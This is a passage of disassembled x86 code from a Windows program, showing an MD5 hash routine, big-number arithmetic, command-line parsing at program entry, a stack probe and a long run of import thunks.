locret_40BF5C: ; CODE XREF: sub_40BF4F+8�j
retn
sub_40BF4F endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_40BF60 proc near ; CODE XREF: sub_40BEE0+2E�p
; sub_40BEE0+57�p
lea esi, dword_447B7C
mov edi, [ebp+14h]
mov ecx, 0Fh
loc_40BF6E: ; CODE XREF: sub_40BF60+19�j
mov eax, [esi+ecx*4]
cmp eax, [edi+ecx*4]
jb short locret_40BF97
ja short loc_40BF7B
dec ecx
jns short loc_40BF6E
loc_40BF7B: ; CODE XREF: sub_40BF60+16�j
mov esi, [ebp+14h]
lea edi, dword_447B7C
xor eax, eax
mov ecx, 10h
loc_40BF8B: ; CODE XREF: sub_40BF60+35�j
mov eax, [esi]
sbb [edi], eax
lea esi, [esi+4]
lea edi, [edi+4]
loop loc_40BF8B
locret_40BF97: ; CODE XREF: sub_40BF60+14�j
retn
sub_40BF60 endp
; =============== S U B R O U T I N E =======================================
sub_40BF98 proc near ; CODE XREF: sub_40BFE9+32�p
; sub_40BFE9+50�p ...
mov eax, ebx
and eax, ecx
push ebx
not ebx
and ebx, edx
or eax, ebx
pop ebx
retn
sub_40BF98 endp
; =============== S U B R O U T I N E =======================================
sub_40BFA5 proc near ; CODE XREF: sub_40BFE9+219�p
; sub_40BFE9+238�p ...
mov eax, ebx
and eax, edx
push edx
not edx
and edx, ecx
or eax, edx
pop edx
retn
sub_40BFA5 endp
; =============== S U B R O U T I N E =======================================
sub_40BFB2 proc near ; CODE XREF: sub_40BFE9+420�p
; sub_40BFE9+43F�p ...
mov eax, ebx
xor eax, ecx
xor eax, edx
retn
sub_40BFB2 endp
; =============== S U B R O U T I N E =======================================
sub_40BFB9 proc near ; CODE XREF: sub_40BFE9+627�p
; sub_40BFE9+645�p ...
mov eax, edx
not eax
or eax, ebx
xor eax, ecx
retn
sub_40BFB9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BFC2 proc near ; CODE XREF: sub_408896+87�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov dword ptr [edi], 67452301h
mov dword ptr [edi+4], 0EFCDAB89h
mov dword ptr [edi+8], 98BADCFEh
mov dword ptr [edi+0Ch], 10325476h
popa
pop ebp
retn 4
sub_40BFC2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40BFE9 proc near ; CODE XREF: sub_408896+9F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edi, [ebp+arg_0]
mov esi, [ebp+arg_4]
mov eax, [edi]
mov dword_447BFC, eax
mov eax, [edi+4]
mov dword_447C00, eax
mov eax, [edi+8]
mov dword_447C04, eax
mov eax, [edi+0Ch]
mov dword_447C08, eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BF98
add eax, [edi]
add eax, [esi]
add eax, 0D76AA478h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BF98
add eax, [edi+0Ch]
add eax, [esi+4]
add eax, 0E8C7B756h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BF98
add eax, [edi+8]
add eax, [esi+8]
add eax, 242070DBh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BF98
add eax, [edi+4]
add eax, [esi+0Ch]
add eax, 0C1BDCEEEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BF98
add eax, [edi]
add eax, [esi+10h]
add eax, 0F57C0FAFh
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BF98
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A8304613h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BF98
add eax, [edi+4]
add eax, [esi+1Ch]
add eax, 0FD469501h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BF98
add eax, [edi]
add eax, [esi+20h]
add eax, 698098D8h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BF98
add eax, [edi+0Ch]
add eax, [esi+24h]
add eax, 8B44F7AFh
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BF98
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFFF5BB1h
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BF98
add eax, [edi+4]
add eax, [esi+2Ch]
add eax, 895CD7BEh
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BF98
add eax, [edi]
add eax, [esi+30h]
add eax, 6B901122h
rol eax, 7
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BF98
add eax, [edi+0Ch]
add eax, [esi+34h]
add eax, 0FD987193h
rol eax, 0Ch
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BF98
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0A679438Eh
rol eax, 11h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BF98
add eax, [edi+4]
add eax, [esi+3Ch]
add eax, 49B40821h
rol eax, 16h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFA5
add eax, [edi]
add eax, [esi+4]
add eax, 0F61E2562h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFA5
add eax, [edi+0Ch]
add eax, [esi+18h]
add eax, 0C040B340h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFA5
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 265E5A51h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFA5
add eax, [edi+4]
add eax, [esi]
add eax, 0E9B6C7AAh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFA5
add eax, [edi]
add eax, [esi+14h]
add eax, 0D62F105Dh
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFA5
add eax, [edi+0Ch]
add eax, [esi+28h]
add eax, 2441453h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFA5
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 0D8A1E681h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFA5
add eax, [edi+4]
add eax, [esi+10h]
add eax, 0E7D3FBC8h
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFA5
add eax, [edi]
add eax, [esi+24h]
add eax, 21E1CDE6h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFA5
add eax, [edi+0Ch]
add eax, [esi+38h]
add eax, 0C33707D6h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFA5
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0F4D50D87h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFA5
add eax, [edi+4]
add eax, [esi+20h]
add eax, 455A14EDh
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFA5
add eax, [edi]
add eax, [esi+34h]
add eax, 0A9E3E905h
rol eax, 5
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFA5
add eax, [edi+0Ch]
add eax, [esi+8]
add eax, 0FCEFA3F8h
rol eax, 9
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFA5
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 676F02D9h
rol eax, 0Eh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFA5
add eax, [edi+4]
add eax, [esi+30h]
add eax, 8D2A4C8Ah
rol eax, 14h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFB2
add eax, [edi]
add eax, [esi+14h]
add eax, 0FFFA3942h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFB2
add eax, [edi+0Ch]
add eax, [esi+20h]
add eax, 8771F681h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFB2
add eax, [edi+8]
add eax, [esi+2Ch]
add eax, 6D9D6122h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFB2
add eax, [edi+4]
add eax, [esi+38h]
add eax, 0FDE5380Ch
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFB2
add eax, [edi]
add eax, [esi+4]
add eax, 0A4BEEA44h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFB2
add eax, [edi+0Ch]
add eax, [esi+10h]
add eax, 4BDECFA9h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFB2
add eax, [edi+8]
add eax, [esi+1Ch]
add eax, 0F6BB4B60h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFB2
add eax, [edi+4]
add eax, [esi+28h]
add eax, 0BEBFBC70h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFB2
add eax, [edi]
add eax, [esi+34h]
add eax, 289B7EC6h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFB2
add eax, [edi+0Ch]
add eax, [esi]
add eax, 0EAA127FAh
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFB2
add eax, [edi+8]
add eax, [esi+0Ch]
add eax, 0D4EF3085h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFB2
add eax, [edi+4]
add eax, [esi+18h]
add eax, 4881D05h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFB2
add eax, [edi]
add eax, [esi+24h]
add eax, 0D9D4D039h
rol eax, 4
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFB2
add eax, [edi+0Ch]
add eax, [esi+30h]
add eax, 0E6DB99E5h
rol eax, 0Bh
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFB2
add eax, [edi+8]
add eax, [esi+3Ch]
add eax, 1FA27CF8h
rol eax, 10h
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFB2
add eax, [edi+4]
add eax, [esi+8]
add eax, 0C4AC5665h
rol eax, 17h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFB9
add eax, [edi]
add eax, [esi]
add eax, 0F4292244h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFB9
add eax, [edi+0Ch]
add eax, [esi+1Ch]
add eax, 432AFF97h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFB9
add eax, [edi+8]
add eax, [esi+38h]
add eax, 0AB9423A7h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFB9
add eax, [edi+4]
add eax, [esi+14h]
add eax, 0FC93A039h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFB9
add eax, [edi]
add eax, [esi+30h]
add eax, 655B59C3h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFB9
add eax, [edi+0Ch]
add eax, [esi+0Ch]
add eax, 8F0CCC92h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFB9
add eax, [edi+8]
add eax, [esi+28h]
add eax, 0FFEFF47Dh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFB9
add eax, [edi+4]
add eax, [esi+4]
add eax, 85845DD1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFB9
add eax, [edi]
add eax, [esi+20h]
add eax, 6FA87E4Fh
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFB9
add eax, [edi+0Ch]
add eax, [esi+3Ch]
add eax, 0FE2CE6E0h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFB9
add eax, [edi+8]
add eax, [esi+18h]
add eax, 0A3014314h
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFB9
add eax, [edi+4]
add eax, [esi+34h]
add eax, 4E0811A1h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov ebx, [edi+4]
mov ecx, [edi+8]
mov edx, [edi+0Ch]
call sub_40BFB9
add eax, [edi]
add eax, [esi+10h]
add eax, 0F7537E82h
rol eax, 6
add eax, [edi+4]
mov [edi], eax
mov ebx, [edi]
mov ecx, [edi+4]
mov edx, [edi+8]
call sub_40BFB9
add eax, [edi+0Ch]
add eax, [esi+2Ch]
add eax, 0BD3AF235h
rol eax, 0Ah
add eax, [edi]
mov [edi+0Ch], eax
mov ebx, [edi+0Ch]
mov ecx, [edi]
mov edx, [edi+4]
call sub_40BFB9
add eax, [edi+8]
add eax, [esi+8]
add eax, 2AD7D2BBh
rol eax, 0Fh
add eax, [edi+0Ch]
mov [edi+8], eax
mov ebx, [edi+8]
mov ecx, [edi+0Ch]
mov edx, [edi]
call sub_40BFB9
add eax, [edi+4]
add eax, [esi+24h]
add eax, 0EB86D391h
rol eax, 15h
add eax, [edi+8]
mov [edi+4], eax
mov eax, dword_447BFC
add [edi], eax
mov eax, dword_447C00
add [edi+4], eax
mov eax, dword_447C04
add [edi+8], eax
mov eax, dword_447C08
add [edi+0Ch], eax
popa
pop ebp
xor eax, eax
retn 8
sub_40BFE9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C834 proc near ; CODE XREF: sub_409A96+F9B�p
var_1C = dword ptr -1Ch
var_4 = word ptr -4
var_2 = word ptr -2
push ebp
mov ebp, esp
sub esp, 1Ch
fnstcw [ebp+var_2]
mov ax, [ebp+var_2]
or ah, 0Ch
mov [ebp+var_4], ax
fldcw [ebp+var_4]
fistp [esp+1Ch+var_1C]
mov eax, [esp+1Ch+var_1C]
fldcw [ebp+var_2]
leave
retn
sub_40C834 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C858 proc near ; CODE XREF: sub_401219+66�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_40C92C ; GetCommandLineA
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_40C88C
push 22h
mov eax, edi
inc eax
push eax
call sub_40CE84
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_40C8A7
mov edi, eax
inc edi
jmp short loc_40C884
; ---------------------------------------------------------------------------
loc_40C883: ; CODE XREF: sub_40C858+2F�j
inc edi
loc_40C884: ; CODE XREF: sub_40C858+29�j
cmp byte ptr [edi], 20h
jz short loc_40C883
jmp short loc_40C8A7
; ---------------------------------------------------------------------------
loc_40C88B: ; CODE XREF: sub_40C858+3E�j
inc edi
loc_40C88C: ; CODE XREF: sub_40C858+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C898
cmp eax, 20h
jnz short loc_40C88B
loc_40C898: ; CODE XREF: sub_40C858+39�j
jmp short loc_40C89B
; ---------------------------------------------------------------------------
loc_40C89A: ; CODE XREF: sub_40C858+4D�j
inc edi
loc_40C89B: ; CODE XREF: sub_40C858:loc_40C898�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_40C8A7
cmp eax, 20h
jz short loc_40C89A
loc_40C8A7: ; CODE XREF: sub_40C858+24�j
; sub_40C858+31�j ...
push 0
call sub_40C980 ; GetModuleHandleA
push 1
push edi
push 0
push eax
call sub_40AB84
pop edi
leave
retn
sub_40C858 endp
; =============== S U B R O U T I N E =======================================
sub_40C8BC proc near ; CODE XREF: sub_40132A+8�p
; sub_402B9B+8�p ...
var_FFC = dword ptr -0FFCh
pop ecx
loc_40C8BD: ; CODE XREF: sub_40C8BC+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_40C8BD
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_40C8BC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_40C8DC proc near ; CODE XREF: sub_401C68+9A�p
; sub_405415+47�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_40C8DC endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C908 proc near ; CODE XREF: sub_4041FC+1DB�p
; sub_4063C4+452�p ...
jmp ds:dword_448374
sub_40C908 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C914 proc near ; CODE XREF: sub_40AB84+35B�p
jmp ds:dword_448378
sub_40C914 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C920 proc near ; CODE XREF: sub_4063C4+124�p
; sub_408C17+173�p
jmp ds:dword_44837C
sub_40C920 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C92C proc near ; CODE XREF: sub_40C858+5�p
jmp ds:dword_448380
sub_40C92C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C938 proc near ; CODE XREF: sub_401614:loc_4016D2�p
; sub_401DB9+288�p ...
jmp ds:dword_448384
sub_40C938 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C944 proc near ; CODE XREF: sub_401C68+D�p
; sub_4022C3+22�p ...
jmp ds:dword_448388
sub_40C944 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C950 proc near ; CODE XREF: sub_401AF1+67�p
; sub_409A96+6D4�p
jmp ds:dword_44838C
sub_40C950 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C95C proc near ; CODE XREF: sub_408477+CF�p
jmp ds:dword_448390
sub_40C95C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C968 proc near ; CODE XREF: sub_401883+12�p
; sub_401883:loc_4018A3�p ...
jmp ds:dword_448394
sub_40C968 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C974 proc near ; CODE XREF: sub_403BBF+F7�p
; sub_4041FC+41�p ...
jmp ds:dword_448398
sub_40C974 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C980 proc near ; CODE XREF: sub_4022C3+1B�p
; sub_402651+121�p ...
jmp ds:dword_44839C
sub_40C980 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C98C proc near ; CODE XREF: sub_4022C3+2D�p
; sub_4022C3+47�p ...
jmp ds:dword_4483A0
sub_40C98C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C998 proc near ; CODE XREF: sub_401C68+6A�p
; sub_401DB9:loc_401F11�p ...
jmp ds:dword_4483A4
sub_40C998 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9A4 proc near ; CODE XREF: sub_403AED+32�p
; sub_4041FC+A3�p ...
jmp ds:dword_4483A8
sub_40C9A4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9B0 proc near ; CODE XREF: sub_40132A+98�p
; sub_401AF1+BC�p ...
jmp ds:dword_4483AC
sub_40C9B0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9BC proc near ; CODE XREF: sub_4056CB+102�p
; sub_408C17+3E�p
jmp ds:dword_4483B0
sub_40C9BC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9C8 proc near ; CODE XREF: sub_40132A+90�p
; sub_401883:loc_4018BF�p ...
jmp ds:dword_4483B4
sub_40C9C8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9D4 proc near ; CODE XREF: sub_401883+9�p
; sub_401883+9B�p ...
jmp ds:dword_4483B8
sub_40C9D4 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9E0 proc near ; CODE XREF: sub_4041FC+5C�p
; sub_40AB84+FE�p
jmp ds:dword_4483BC
sub_40C9E0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9EC proc near ; CODE XREF: sub_403AED+6C�p
jmp ds:dword_4483C0
sub_40C9EC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C9F8 proc near ; CODE XREF: sub_4041FC+134�p
; sub_409A96+B0E�p ...
jmp ds:dword_4483C4
sub_40C9F8 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA04 proc near ; CODE XREF: sub_403530+67�p
; sub_4037FA+3D�p ...
jmp ds:dword_4483C8
sub_40CA04 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA10 proc near ; CODE XREF: sub_4035A5+A2�p
; .text:00403A3F�p
jmp ds:dword_4483CC
sub_40CA10 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA1C proc near ; CODE XREF: sub_4035A5+78�p
; .text:004039E8�p
jmp ds:dword_4483D0
sub_40CA1C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA28 proc near ; CODE XREF: sub_402B9B+218�p
jmp ds:dword_4483D4
sub_40CA28 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA34 proc near ; CODE XREF: sub_4063C4+68�p
jmp ds:dword_4483D8
sub_40CA34 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA40 proc near ; CODE XREF: sub_402B9B+1D2�p
jmp ds:dword_4483DC
sub_40CA40 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA4C proc near ; CODE XREF: sub_402B9B+5BC�p
jmp ds:dword_4483E0
sub_40CA4C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA58 proc near ; CODE XREF: sub_401C68+39�p
; sub_40211D:loc_40219E�p ...
jmp ds:dword_4483E4
sub_40CA58 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA64 proc near ; CODE XREF: sub_402B9B+A7�p
jmp ds:dword_4483E8
sub_40CA64 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA70 proc near ; CODE XREF: sub_4063C4+42B�p
; sub_408C17+BE�p ...
jmp ds:dword_4483EC
sub_40CA70 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA7C proc near ; CODE XREF: sub_401AF1+86�p
; sub_405249+6A�p ...
jmp ds:dword_4483F0
sub_40CA7C endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA88 proc near ; CODE XREF: sub_405249+AD�p
; sub_4056CB+77�p ...
jmp ds:dword_4483F4
sub_40CA88 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CA94 proc near ; CODE XREF: sub_40AB2B+1C�p
jmp ds:dword_4483F8
sub_40CA94 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAA0 proc near ; CODE XREF: sub_405249+28�p
jmp ds:dword_4483FC
sub_40CAA0 endp
; ---------------------------------------------------------------------------
db 2 dup(90h)
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAAC proc near ; CODE XREF: sub_40132A+8B�p
; sub_401AF1+AE�p
jmp ds:dword_448400
sub_40CAAC endp
; ---------------------------------------------------------------------------
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40CAB8 proc near ; CODE XREF: sub_40107A+13�p
